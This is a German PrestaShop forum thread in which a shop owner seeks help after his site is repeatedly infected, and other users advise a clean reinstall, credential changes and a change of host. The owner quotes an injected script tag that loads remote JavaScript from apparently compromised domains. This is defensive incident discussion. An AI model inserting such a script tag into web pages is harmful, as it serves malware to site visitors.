Jump to content
nntops

[gelöst]Ich brauch dringend Eure Hilfe!

Recommended Posts

Ich benötige dringend Eure Hilfe!

 

Ich habe mir den Presta-Shop vor ca.14 Tagen über "Checkdomain" direkt installieren lassen.
Habe meine Artikel, Text und Bilder eingepflegt, Versandarten eingestellt....Fertig. 

 

Shop Läuft!

 

Vor 3 Tagen der Schock: Meine Bilder der Slideshow waren untereinander aufgelistet und meine Kategorien wenn ich anklickte waren leer. Habe mir dann den Quelltext der Seite anzeigen lassen und hier wurde beim ersten mal ein Verweis auf eine Russische Seite angezeigt.

 

Habe dann ein gesichertes Backup aufgespielt und meine Zugangsdaten über einen anderen PC geändert und siehe da, der Shop funktioniert wieder.

 

Bis eben war mein Rechner nicht mehr in Betrieb. Nun Startete ich den PC und bin auf meinen Shop und was muss ich sehen? Der Shop "steht" wieder und die leere Seiten haben folgenden Querverweis:

 

  <script src="http://werbeagentur-untermain.de/fonts/EvFzPod6.php?id=55832444" type="text/javascript"></script>

 

 

Jetzt spiel ich eben wieder mein sicheres Backup auf.

 

Nach Rücksprache mit Checkdomain ( Surveranbieter ) muss es nicht unbedingt ein Virus sein, sonder kann auch durch ein Modul entstehen. 

 

Als er dieses sagte, viel mir ein dass ich gestern abend gegen 0:00h als der Shop noch lief auf der Shopseite ( nur sichtbar über Taplet und Handy ) links unten im Eck einen Button hatte, der von Prestashop ist, den hab ich mal angeklickt. Hier stand was von " Mein xy sei noch leer ", dann kann man auch die Seite groß und klein machen und und und....viele Features. Danach hatte ich das Taplet ausgemacht und heute morgen war das Problem erneut.

 

Nun meine Frage: Wer hatte schon mal das Problem, wie kann man diesen Hilfe-Button im unteren Linken Eck deaktivieren?

 

Woran kann das Liegen? Passwörter wurden geändert, auch von anderen Zugängen aus.... dennoch bleibt dieses Problem bestehen.

 

Shop: http://nizzo.de

 

 

 

Danke schon mal im voraus.....

Gruß Nico

Edited by nntops (see edit history)

Share this post


Link to post
Share on other sites

Bitte ändere den Titel deines Topics. Siehe hier warum: http://www.prestashop.com/forums/topic/261675-forums-regeln/

 

Verwende stets kurze und selbsterklärende Überschriften für dein Thema.
Überschriften sollen dein Thema zutreffend beschreiben, damit es künftig auch bei der Suche leicht gefunden wird. Hilfreich sind auch zusätzliche Stichworte. Vermeide deshalb Ausdrücke wie „Dringend“, „Helft mir“ o.ä.

 

Danke für deine Mitarbeit.

 

Titel ändern: Editiere deinen Topic mit "Edit" -> Use full editor und gehe zur Überschrift. Ändere diese dort ab

Share this post


Link to post
Share on other sites

Zu deiner Frage: Es scheint, dass jemand von außen Zugriff auf deinen Shop hatte. Wenn du den Shop nochmal aufspielst, dann ändere bitte nochmals alle Zugangspasswörter.

 

Welche Module verwendest du denn, die nicht nativ sind ?

Share this post


Link to post
Share on other sites

Welcher Dienst ist brow.si, der mit deinem Shop mitläuft und welche Rolle spielt die werbeagentuer untermain ?

 

Der Shop ist bei mir sichtbar, allerdings funktioniert kein einziger Kategorielink. Leere bitte einmal den Cache deines Browsers und generiere eine neue .htaccess.

 

Deine .htaccess des Shops im Wurzelverzeichnis des Shop umbenennen und unter Voreinstellung -> SEO & URLS -Friendly URL klicken und speichern. Es sollte dann eine neue .htaccess generiert werden. Überprpüfe es, ob sie generiert wrude.

Share this post


Link to post
Share on other sites

Eine andere Möglichkeit den Block Links neu zu generieren ist: Du gehst zum Modul Block Kategorien und setzst den Filter zurück. Bringt das nichts, dann deinstalliere das Modul und isntalliere es wieder. Das gleiche mit dem Slider.

Share this post


Link to post
Share on other sites

Der homeslider ist der Original von Prestashop ? Wenn ja, dann ist das eine Fehlermeldung von avast. Manche Filter melden jedes JS als verdächtig, weil JS auf dem Client ausgeführt wird.

Share this post


Link to post
Share on other sites

Es scheint auch irgendwas über das wishlist Modul eingeschleust zu sein. Unten im Footer ist bei meine Wunschlisten ein Script eingefügt:

post-280425-0-07575500-1385541101_thumb.png

 

 

Share this post


Link to post
Share on other sites

Wow, erst mal vielen dank für die rasche Antworten...

Also: Der Prestashop ist bis jetzt "Original" ausser das ich meine Bilder und den Text eingepflegt habe.

 

Diese Werbeagentur ist eingespielt worden, vermutlich haben die nichts mit zu tun. Vor paar Tagen war es eine Seite in Russland.

 

Ich hatte vorher Jahrelang Gambio als Shop...das lief ohne Probleme.

 

Das Brow.si war von Anfang an im Shop dabei, dachte das es original ist und dazu gehört. ...

Share this post


Link to post
Share on other sites

Ich würde lieber Prestashop selber installieren, dann weisst du wenigstens, dass die Dateien unverseucht sind. Mein Virenscanner meldet beim Prestashop Slider normalerweise keinen Fehler.

Share this post


Link to post
Share on other sites

Deine ganze Installation scheint verseucht zu sein. Jetzt kommt noch eine Virenmeldung

post-280425-0-24349600-1385542229_thumb.png

Share this post


Link to post
Share on other sites

OK, dann bleibt nur noch die Frage: Wie deaktiviere ich das "Brow.si".... ich denk das ist der Ursprung

Share this post


Link to post
Share on other sites

Ich würde die avast-Meldung nicht so auf die Waageschale legen. Avast gibt sehr viele Fehlermeldugnen aus, in Bezug auf JS, weil sie eben am Client ausgeführt werden. Das hatte ich aber oben schon beschrieben. Bei mir lokal am PC werden keinerlei Viren und dergleichen registriert. Habe die Seite mit zig Tools jetzt durchlaufen lassen.

Share this post


Link to post
Share on other sites

Bitte generiere eine neue .htaccess oder setze die beiden Module homeslider und Blok Kategorie zurück. Dann sollten die Links und der Slider wieder funktionieren.

Share this post


Link to post
Share on other sites

OK: Ich muss mich Outen...

Was Quelltext, html und PHP angeht...bin ich "Jungfrau" :blush: 

 

Also :

 

Leere bitte einmal den Cache deines Browsers und generiere eine neue .htaccess. "

Das leeren des Caches bekomm ich noch hin, aber der Rest..... ähm ja...

 

und im Modul deaktivieren? Ja aber nur wo  :huh2:

Edited by nntops (see edit history)

Share this post


Link to post
Share on other sites

Noch was:
Im Admin bereich stand was von Brow.si:

 

  • Brow.si: Site ID should be configured for customizing and analytics aggregation. "

Share this post


Link to post
Share on other sites

.htaccess neu generieren: Voreinstellungen -> SEO & URL's dort die friendly URL's mal deaktivieren und speichern und dann wieder aktivieren und speichern.

Bitte überprüfe aber auf deinem FTP, ob die .htaccess neu geschrieben wurde. Dazu gehst du zu deinem FTP und suchst nach der .htaccess im Wurzelverzeichnis des Shops und liest das Datum und Uhrzeit ab.

 

Die Module zurücksetzen habe ich weiter oben erklärt.

 

Dazu gehört auch das Modul Block Tags, denn hier funktioniert auch kein Link mehr.

Share this post


Link to post
Share on other sites

 

Noch was:

Im Admin bereich stand was von Brow.si:

 

  • Brow.si: Site ID should be configured for customizing and analytics aggregation. "

 

Das Modul ist nicht konfiguriert ? Wenn du keine Zugangsdaten hast, dann einfach das Modul deinstallieren. Kann sein, dass diese Modul dir alles in Durcheinander gebracht hat.

Share this post


Link to post
Share on other sites

Ich würde die avast-Meldung nicht so auf die Waageschale legen. Avast gibt sehr viele Fehlermeldugnen aus, in Bezug auf JS, weil sie eben am Client ausgeführt werden. Das hatte ich aber oben schon beschrieben. Bei mir lokal am PC werden keinerlei Viren und dergleichen registriert. Habe die Seite mit zig Tools jetzt durchlaufen lassen.

 

Also spätestens wenn Werbeeinblendungen aus Russland eingeblendet werden, würden bei mir alle Warnlichter angehen und ich würde die Virenmeldungen sehr wohl ernst nehmen. Mein Avast zeigt sonst solche Meldungen nicht an.

Share this post


Link to post
Share on other sites

Das is ja das Problem! Diese Meldung wurde mir im oberen Bereich angezeigt, aber ich finde keinerlei hinweise wo sich das Brow.Si befinden soll. UNd auch die Slidshow kann ich nicht mehr finden

Share this post


Link to post
Share on other sites

Also spätestens wenn Werbeeinblendungen aus Russland eingeblendet werden, würden bei mir alle Warnlichter angehen und ich würde die Virenmeldungen sehr wohl ernst nehmen. Mein Avast zeigt sonst solche Meldungen nicht an.

Deshalb die Frage wer werbeangentur XY ist... bzw. wlehce Rolle die spielen. Mein Provider hostet auch in Russland und meine Server laufen durch Russland... Sind aber keine Hacker oder so... Teile des Netzwerkes ist in Russland und kann auch nachverfolgt werden.

Share this post


Link to post
Share on other sites

Das is ja das Problem! Diese Meldung wurde mir im oberen Bereich angezeigt, aber ich finde keinerlei hinweise wo sich das Brow.Si befinden soll. UNd auch die Slidshow kann ich nicht mehr finden

Beim zurückspielen wurden auch alle Module zurückgespielt ? Nutze im Tab-Reiter Module -> Module die Suche über der linken Spalte und tippe dort brow ein, bzw. die ersten Buchstaben der anderen Module.

Share this post


Link to post
Share on other sites

Ich würde keinem Provider erlauben, ohne mein Wissen irgendwelche Werbescripte einzuspielen. Das javascript mit der Werbeagentur taucht im Quelltext an verschiedenen Stellen auf. Ich würde in diesem Fall nicht die vom Provider installierte Version von Prestashop nehmen, sondern prestashop selber downloaden und installieren. Das ist nicht schwer und du sparst dir die Zeit mit Fehlersuche. Diese Installation ist in jedem Fall suspekt (was nicht am Hoster liegen muss, vielleicht weiss der das ja gar nicht, dass da was eingeschleust ist).

Share this post


Link to post
Share on other sites

+1 Würde ich auch nicht machen. Für mich sind grundsätzlich SEO-Werbeagenturen sowieso suspekt, denn die manipulieren die Suchmaschinen und man bindet sich an die für die Ewigkeit. Nur wenige dieser Agenturen beraten einen wirklich seriös... SEO ist eine langwierige Arbeit und nicht von heute auf morgen, denn so schnell reagiert keine Suchmaschine, so dass man von gestern auf heute die ersten Positionen im Ranking erlangt. SEO ist harte und langjährige Arbeit.

Share this post


Link to post
Share on other sites

Ok, super....Brow.si is deinstalliert!

 

Eine letzte Frage ( Vorab )!!:

 

Wenn ich mir den Shop nun "Manuel" herunterlade und installiere, dann sind alle meine Einstellungen verschwunden und meine benutzte Datenbank kann ich wohl nicht mehr aufspielen, oder?

Kurz um: Alle Texte, Bilder und einstellungen, alle Artikel usw. muss ich neu einspielen?

Share this post


Link to post
Share on other sites

Also, du kannst nicht eine Datenbank in einen shop nochmals installieren. Du kannst nur entweder die Datenbank manuell Upgraden, oder den Shop wiederherstellen indem du sowohl FTP, als auch Datenbnak 1:1 wieder einspielst.

 

Weißt du wie diese Werbeangentur bei dir eingebunden ist ? Im Header aller Seiten finde ich ein laufendes JS.

 

<script src="http://werbeagentur-untermain.de/fonts/EvFzPod6.php?id=55832444" type="text/javascript"></script>

 

Dieses Skript solltest du loswerden, wenn du die Agentur nicht beauftragt hast mit SEO, Ranking, & Co.

Share this post


Link to post
Share on other sites

Gehst du im übrigen auf http://werbeagentur-untermain.de, dann gibt es die Seite garnicht.  Wer hat dir das Skript aufgespielt ?

 

 

EDIT: komischerweise geht jetzt die Domain der Agentur wieder ??? Egal wie auch immer, das Skript von denen so schnell wie möglich loswerden...

Edited by cd2500 (see edit history)

Share this post


Link to post
Share on other sites

Ich habe leider niemanden beauftragt.

 

Ich lade mir eben den Shop herunter, werde ihn installieren und neu aufspielen...wenn möglich

 

Danke an Euch allen, auch wenn ich Nerven gekostet hab.

Mal sehen was in zukunft daraus wird. 

Share this post


Link to post
Share on other sites

VORSICHT !!!!

 

Du kannst folgendermaßen vorgehen:

 

Software downloaden, und NUR die Software komplett neu auf deinem FTP laden. Allerdings, ist das kein Garant, dass das Fremdskript verschwindet dadurch. Ja nicht NEU INSTALLIEREN UND DIE DB RAUFLADEN.

 

 

Du solltest eigentlich den FTP bis auf die Bilder, Sprachen und Editorial Modul, Slider Modul und Zahlmodule (dmit du nicht alles neu konfigurieren musst)  komplett löschen und die Originaldateien hinaufladen.

 

BEVOR du das machst. Bitte poste hier einmal von deinem Theme die header.tpl also die Datei header.tpl unter /themes/default/header.tpl.

 

Evtl. ist nur diese verändert worden.

Share this post


Link to post
Share on other sites

Du darfst auf keinen Fall deine settings.inc.php mit einer Neuinstallation überschreiben, denn dort werden Sicherheitshashes geschrieben, die dann in Parität mit der Datenbank abgecheckt werden. Sind diese Hashes der alten Datenbank mit einer Neuinstallation überschrieben, dann ist sie unbrauchbar. Deshalb bitte nicht neuinstallieren, sondern nur die FTP-Skripte austauschen.

Share this post


Link to post
Share on other sites

prestamax du hast Recht, habe jetzt ein Tool gefunden, welches eine Malware gefunden hat: http://sitecheck.sucuri.net/results/nizzo.de

 

Es ist genau dieses Skript von der werbeagentur.

 

Ich würde jetzt in diesem Fall wirklich den kompletten FTP plattmachen und ALLEs, bis auf Bilder (/img) und Übersetzungen (/lang) löschen. AUCH DIE MODULE ! Leider musst du dann Editorial und Slider, sowie Zahlmodule wieder neu konfigurieren, aber dafür bist du ein Skript los, welches sich auf deinem FTP befindet.

Share this post


Link to post
Share on other sites

Bahnhof! :'(

 

Ich installiere den Shop nicht neu von Checkdomain sondern hab mir nur die Software heruntergeladen.

 

Ich werde wie folgt vorgehen:

 

Ich hab noch das original BackUp das ich neulich neu aufgespielt hatte und der dann Shop lief.

 

Das werde ich oer FTP neu aufspielen, dann das Brow.si deaktivieren (falls wieder aktiv) und anschließend die .htacass neu generieren.

 

 

Dann mal daumen drücken!

Share this post


Link to post
Share on other sites

OK probieren kannst du es und hoffentlich ist das Back-up sauber. Aber nur die Dateien auf deinem FTP aufspielen. Datenbank musst du nicht anrühren.

Share this post


Link to post
Share on other sites

nntops, das halte ich für riskant, denn irgendwo ist bei deiner Installation (und auch in deinem Backup) etwas eingeschleust. Allein des Deaktivieren eines Plugins bietet keine Sicherheit, solange du nicht weisst, wo die Sicherheitslücke ist. Lieber einmal die Arbeit einer sauberen Neuinstallation und dann hast du Ruhe ...

P.S.: Und bei einer Neuinstallation würde ich vorher alle Dateien löschen, nicht nur überspielen, denn manchmal werden Scripte durch zusätzlich eingefügte Dateien erzeugt. Die Schreibrechte der Ordner würde ich auch überprüfen, nicht dass da am Ende großzügige Schreibrechte für die Öffentlichkeit gesetzt sind ...

Edited by prestamax (see edit history)

Share this post


Link to post
Share on other sites

Bin ich der gleichen Meinung. Ich würde das FTP komplett plattmachen und nur folgende Dateien belassen, also nicht löschen:

 

 /config (inkl. Unterordner und Dateien) und /img (inkl. Unterordner und Dateien)

 

und danach die Originaldateien alle neu aufspielen.

BIS AUF: /img/p und /img/c mitsamt Unterordner und Inhalt der Unterordner aus dem Paket.

 

Die Malware hat sich bei dir anscheinend in alle JS eingeschleust.

Share this post


Link to post
Share on other sites

Der Shop ist jetzt frei vom Skript. Du solltest jetzt bitte die .htaccess neu generieren und den Cache leeren. Welche Prestashopversion hast du ?

Share this post


Link to post
Share on other sites

Suppi, funktioniert nun alles wieder und der Shop ist frei von der Malware. Deine ganzen Zugangsdaten zum FTP und auch zum Back-Office des Shops soltlests du auf jeden Fall ändern. Da an der Datenbank anscheinend nichts geändert wurde, bleibt es dir überlassen, ob du den Zugang ändern möchtest oder nicht. (Dann bitte nicht in der config-Datei des Shops auch ändern entsprechend).

 

Den Homeslider deinstallieren, nochmal installieren und neu konfigurieren. Hast du dieses Modul auch überschrieben mit den Originaldateien ? Der arbeitet nämlich auch mit JS, nicht dass von dort aus sich die Malware wieder installiert...

Share this post


Link to post
Share on other sites

Moin zusammen, kurze Info:

 

Habe gestern den Shop komplett neu eingespielt von einem "Externen Rechner" ( Fa.-Rechner ).

Ergebniss: Shop hat die selben Probleme wieder.

 

Diesmal ist diese Seite im Querverweis: 

 

<script src="http://www.soibiminvestmentgroup.com/pdw_file_browser/edC2r3Ic.php?id=55832444" type="text/javascript"></script>

 

Es liegt wohl am Prest-Shop

Share this post


Link to post
Share on other sites

Ja ich habe deas gerade gecheckt. Bitte wende dich an Hetzner (Serverinhaber), oder suche dir einen anderen Provider für deinen Shop. Dein Shop ist wieder gehackt worden und der Server vermutlich voller bad neighbourhood hosts (unter der gleichen IP sind ca. 490 andere Domains gehostet).

 

Es liegt keinesfalls am Prestashop, sondern an deinen unsicheren Server wo du deinen Shop gehostet hast.

  • Like 1

Share this post


Link to post
Share on other sites

Muss iwas unternehmen. Checkdomain sagt es liegt definitiv NICHT an ihnen.

Geb das ganze jetzt erst mal auf :-(

 

Danke für alles!

Share this post


Link to post
Share on other sites

Ich würde wahrscheinlich auch den Hoster wechseln. Hast du denn wirklich ALLE Dateien vor der Neuinstallation gelöscht? Auch in den img Ordnern musst du alles löschen bzw. schauen, ob da nicht etwas eingeschleust wurde. Meist sind es getarnte Dateien, die solche Scripts generieren. Am sichersten ist daher wirklich komplett ALLES löschen, also auch die Produktbilder, denn es kann sein, dass dort eine getarnte Datei hochgeladen wurde. Dann nochmal neu aufsetzen (inkl. neuer Datenbank), auch wenn es Arbeit ist. Aber die Arbeit hast du bei einem Umzug ja auch.

Share this post


Link to post
Share on other sites

Muss iwas unternehmen. Checkdomain sagt es liegt definitiv NICHT an ihnen.

Geb das ganze jetzt erst mal auf :-(

 

Danke für alles!

Sorry, ein Hoster wird immer sagen es liegt nicht an ihn. Bitte beachte auch, dass du das bekommst wofür du zahlst. Gratis oder zum quasi Null-Tarif ist halt auch nicht mehr drinnen. Lieber ein wenig mehr ausgeben, aber dafür keine Probleme haben.

 

SSD wäre empfehlenswert. Siehe Diskussion hier: http://www.prestashop.com/forums/topic/196232-hostingempfehlungen-von-ps-user-sowie-von-providern-direkt/

Share this post


Link to post
Share on other sites

moin nntops

 

Aufgeben scheint mir die schlechteste Option!

 

Ich habe mir das mal angesehen, deine Domain liegt auf einem Server host85.checkdomain.de, auf diesem Server liegen noch eine Menge anderer Domains(z.B. http://www.schweden-gruppenunterkunft.de...), sehr viele der Domains sind mit Wordpress aufgebaut - aber beim parsen dieser Domains taucht nirgends dein malware-Hack auf, das lässt vermuten das der Virus  doch eher über dich eingeschleusst wird.

 

Der hack wird bei sucuri gelistet:

 

http://labs.sucuri.net/?details=werbeagentur-untermain.de

 

wobei die Kollegen von werbeagentur-untermain ganz offensichtlich selbst gehackt worden sind (STRATO-SERVER) und möglicherweise garnichts von ihrem Glück wissen. (Mail geht gleich raus)

 

Mein Tipp:

Bitte checkdomain deinen Account zu löschen und neu anzulegen, dadurch hast du die Sicherheit das ALLES clean ist.

Dann installiere alles neu wie oben beschrieben möglichst von einem anderen als den beiden bereits verwendeten Rechnern, oder bitte hier im Forum jemanden, das er dir die Software kurz aufspielt. Auf garkeinen Fall solltest du ein Backup verwenden.

 

@cd2500

 

 Für mich sind grundsätzlich SEO-Werbeagenturen sowieso suspekt, denn die manipulieren die Suchmaschinen und man bindet sich an die für die Ewigkeit. Nur wenige dieser Agenturen beraten einen wirklich seriös... SEO ist eine langwierige Arbeit und nicht von heute auf morgen, denn so schnell reagiert keine Suchmaschine, so dass man von gestern auf heute die ersten Positionen im Ranking erlangt. SEO ist harte und langjährige Arbeit.

 

Der Zusammenhang zwischen dem hier beschriebenen Fehler und deiner Rundum-Attacke gegen SEO-Optimierer wird wohl dein Geheimnis bleiben - ich erinnere mich, dass wir uns vor Jahren schonmal in einem anderen Forum (fängt mi "A" an) begegnet sind (Shopprobleme --> Existenzangst --> Shopumstieg --> SEO-Probleme), vielleicht erinnerst du dich. Damals war dir die Hilfe von den unseriösen Manipulierern nicht ganz so suspekt.

Zu glauben, daß man heutzutage ohne intensive SEO-Maßnahmen mit einem Online-Versandhandel Erfolg haben könnte ist wohl mehr als blauäugig. Vernachlässigt man den SEO-Bereich oder begeht man die für Anfänger und Laien typischen Fehler bedeutet das in aller Regel das Aus für den Shop auch wenn der Shop ansonsten "1a" ist.  (Wink mit dem Zaunpfahl)

 

Grüsse Whiley

Share this post


Link to post
Share on other sites

 

@cd2500

 

Der Zusammenhang zwischen dem hier beschriebenen Fehler und deiner Rundum-Attacke gegen SEO-Optimierer wird wohl dein Geheimnis bleiben - ich erinnere mich, dass wir uns vor Jahren schonmal in einem anderen Forum (fängt mi "A" an) begegnet sind (Shopprobleme --> Existenzangst --> Shopumstieg --> SEO-Probleme), vielleicht erinnerst du dich. Damals war dir die Hilfe von den unseriösen Manipulierern nicht ganz so suspekt.

Zu glauben, daß man heutzutage ohne intensive SEO-Maßnahmen mit einem Online-Versandhandel Erfolg haben könnte ist wohl mehr als blauäugig. Vernachlässigt man den SEO-Bereich oder begeht man die für Anfänger und Laien typischen Fehler bedeutet das in aller Regel das Aus für den Shop auch wenn der Shop ansonsten "1a" ist.  (Wink mit dem Zaunpfahl)

 

Grüsse Whiley

Sorry du scheinst mich mit jemanden anderem zu verwechseln. Ich war noch nie in einem Forum tätigt, welches mit A beginnt.

 

Ich persönlich habe keine solcher Agenturen beauftragt, kenne aber nur zu gut die Methoden um sofort zu einem schnellen guten Ranking zu kommen. Und das ist was solche Agenturen auch versprechen...

Auch ohne eine Agentur ranken meine Seiten sehr gut auf den ersten Plätzen. Von daher kann ich auch selbst beurteilen und behaupten, dass SEO keine Aufgabe von heute auf morgen ist, sondern harte und langjährige/konstante Arbeit. Habe weiter oben auch nichts anderes behauptet...

 

Und ja die Agentur "Werbeagentur Untermain" war selbst Opfer von Hackern, denn die Seite war einige Std. nicht erreichbar, aber danach dann doch wieder.

 

Ich würde einfach den Provider wechseln. Ein Anlegen eines neuen Accounts bringt meiner Ansicht nach überhaupt nichts, solange sein Projekt auf diesem Server bleibt. Es sind viel zuviel bad neighbouhoods vorhanden.

Share this post


Link to post
Share on other sites

Doch jetzt weiss ich es wieder, welches Forum du meinst. Habe ich die Ratschläge dort auch immer angenommen ? Ich denke nicht, weil dort auch viel Quatsch verbreitet wrid. Ich habe meine Seiten selbst ohne die Vorschläge von dort auf die ersten Plätze (und langfristig) gebracht, anhand meiner eigenen Beobachtungen. Aber stimmt ganz am Anfang und das ist schon sehr lange her, war ich dort tätig mit Fragen, meine ersten Gehversuche in Sachen SEO. Mittlerweile sind aber mindestens 7 Jarhe vergangen und ich dort auch garnicht mehr tätig und die Software die damals eingesetzt wurde auch eine komplett andere ist. Ich bin mit Prestashop rundum glücklich. Ist die beste Shopsoftwarewahl bisher die ich im Einsatz hatte. Heute bin ich auch KEIN Shopbetreiber mehr, sondern habe auf die Seite der Profis gewechselt.

  • Like 1

Share this post


Link to post
Share on other sites

This has gone completely off topic. I'm closing it.

 

My most sincere apologies to nntops, you're welcome to open a new thread if you want to!

  • Like 2

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More